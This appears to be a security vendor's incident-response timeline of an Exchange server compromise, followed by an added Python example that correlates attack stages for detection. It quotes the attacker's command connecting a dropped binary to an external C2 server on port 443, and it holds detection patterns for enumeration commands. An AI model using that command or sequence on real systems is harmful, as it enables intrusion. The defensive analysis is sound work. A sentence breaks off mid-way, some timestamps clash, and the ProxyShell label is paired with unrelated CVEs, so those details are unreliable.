Incident Response Timeline – Microsoft Exchange Vulnerability

Time from detection to escalation: 20 minutes

Join us for our latest real-world attack example, which walks through an attack on a customer in the construction industry in which the attacker leveraged the Microsoft Exchange vulnerabilities disclosed in early 2021. We'll show you step by step how the Arctic Wolf team helped this customer both stop the immediate attack and build a long-term fix for these vulnerabilities.

Legend:

  • Adversary (Attacker)
  • Arctic Wolf's Platform
  • Arctic Wolf Triage Team
  • Arctic Wolf Customer
  • Arctic Wolf Concierge Security Team

ATTACKER'S 5-MONTH WINDOW

  • March 2021

    Microsoft releases out-of-band patch to address multiple critical vulnerabilities within Microsoft Exchange

  • April 2021

    Microsoft releases security updates for a second set of RCE vulnerabilities within Microsoft Exchange

  • May - July 2021

    These collections of vulnerabilities are dubbed ProxyShell. Bad actors leverage three separate vulnerabilities as part of a single attack to bypass authentication and execute code

  • August 2nd, 2021

    Customer completes onboarding with Arctic Wolf

On Tuesday, March 2, 2021, one week ahead of its typical Patch Tuesday release, Microsoft released an out-of-band patch to address

What do these vulnerabilities mean?

These vulnerabilities allowed attackers to take full control of a Microsoft Exchange Server exposed to the public internet. Microsoft reported that these vulnerabilities were being actively exploited by HAFNIUM, a threat group they describe as state-sponsored and operating out of China, with attacks dating back to at least January 6, 2021.

The vulnerabilities include CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

Detailed attack timeline (overview):

  • Mon., Aug. 2: 5:00pm
  • Sat., Aug. 7: 7:27pm; 7:29-7:47pm; 7:50pm; 8:08pm; 8:09pm
  • Mon., Aug. 9: 9:00am

01

Source: Customer Onboarding | Monday, August 2

[Customer] completes onboarding with Arctic Wolf 5 days prior, with Service Delivery kicking off on Monday, August 2, 2021.
  • 1:16pm

02

Source: Arctic Wolf Agent | Saturday, August 7 | 7:27pm

The Arctic Wolf Agent observes PowerShell enumeration commands on [Exchange Server] and begins investigation into [User1] activity.
  • 7:27pm

Note: PowerShell Empire is an incredibly powerful post-exploitation tool. It provides capabilities including privilege escalation, lateral movement, credential theft, and more.

TIME TO DETECTION: Less than 2 minutes


03

Arctic Wolf Triage Team: Investigation Begins | Saturday, August 7 | 7:29pm - 7:47pm

The Arctic Wolf Triage Team begins investigation and confirms the enumeration commands are suspicious, possibly Ryuk. The Triage Team creates a ticket and contacts [customer].
  • 7:29pm

Note: Used to target enterprise environments, Ryuk ransomware typically encrypts files on an infected system and holds them ransom for cryptocurrency.

04

Monitoring Continues: Arctic Wolf Platform | Saturday, August 7 | 7:50pm

Source: Arctic Wolf Agent

  • SVN.exe dropped to [Exchange Server]
  • PowerShell Command “svn.exe–connect 135.181.x.x:443 –Pass Pasword123”

Log Source: Arctic Wolf Sensor

  • IP 135.181.x.x associated with C2 server in Finland
  • 7:50pm

Note: SVN.exe is TortoiseSVN, a Subversion client that can be used to add, remove, or modify files in a directory.

05

Source: Arctic Wolf Agent | Saturday, August 7 | 8:08pm

[User1] added to [Exchange Server] local Administrators Group.
Credentials to local [Admin] account were reset.
  • 8:08pm


Less than a minute later
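Detection logic for the sequence in steps 02 through 05, as an added example in Python that is not part of this page or of the Arctic Wolf platform: it classifies constructed sample events (PowerShell enumeration, a binary given an external ip:port on its command line, a local Administrators group addition, a credential reset) and correlates them per host within a one-hour window. The event field names, stage names and sample values are assumptions made for illustration.

```python
# Added example: correlate the stages seen in steps 02-05 on one host into a single
# escalation. Event schema, stage names and sample values are illustrative assumptions.
from datetime import datetime, timedelta
import ipaddress
import re

# Constructed sample telemetry (not real logs); 203.0.113.10 is a TEST-NET address.
SAMPLE_EVENTS = [
    {"ts": "2021-08-07T19:27:10", "host": "EXCH01", "type": "process", "image": "powershell.exe",
     "cmdline": 'powershell -c Get-ADUser -Filter * ; net group "Domain Admins" /domain'},
    {"ts": "2021-08-07T19:50:02", "host": "EXCH01", "type": "process", "image": "svn.exe",
     "cmdline": "svn.exe --connect 203.0.113.10:443 --Pass [redacted]"},
    {"ts": "2021-08-07T20:08:30", "host": "EXCH01", "type": "group_change", "event_id": 4732, "group": "Administrators"},
    {"ts": "2021-08-07T20:08:41", "host": "EXCH01", "type": "password_reset", "event_id": 4724, "target": "Administrator"},
]
ENUM_RE = re.compile(r"\b(Get-ADUser|Get-ADComputer|net\s+(group|user|localgroup)|whoami|nltest)\b", re.I)
IP_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):\d{1,5}\b")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_external(ip_str):  # True when the address lies outside the usual internal/loopback ranges
    try:
        return not any(ipaddress.ip_address(ip_str) in net for net in INTERNAL_NETS)
    except ValueError:  # e.g. 999.1.1.1 passes the regex but is not an address
        return False

def classify(ev):  # map one event to an attack stage name, or None if it matches nothing
    if ev["type"] == "process":
        if ENUM_RE.search(ev["cmdline"]):
            return "enumeration"
        m = IP_PORT_RE.search(ev["cmdline"])
        if m and is_external(m.group(1)):
            return "external_connect"
    if ev["type"] == "group_change" and ev.get("event_id") == 4732 and ev["group"].lower() == "administrators":
        return "local_admin_added"
    if ev["type"] == "password_reset" and ev.get("event_id") == 4724:
        return "credential_reset"
    return None

def correlate(events, window=timedelta(hours=1)):
    """Return {host: [stages]} for hosts where enumeration is followed, within window, by a local Administrators change or a credential reset."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if stage := classify(ev):
            by_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), stage))
    alerts = {}
    for host, hits in by_host.items():
        stages = [s for ts, s in hits if ts - hits[0][0] <= window]
        if "enumeration" in stages and {"local_admin_added", "credential_reset"} & set(stages):
            alerts[host] = stages
    return alerts
```

Running `correlate(SAMPLE_EVENTS)` yields one alert for EXCH01 listing all four stages in order; a host that shows only enumeration and an external connection, or only a benign internal `svn.exe` checkout, produces none.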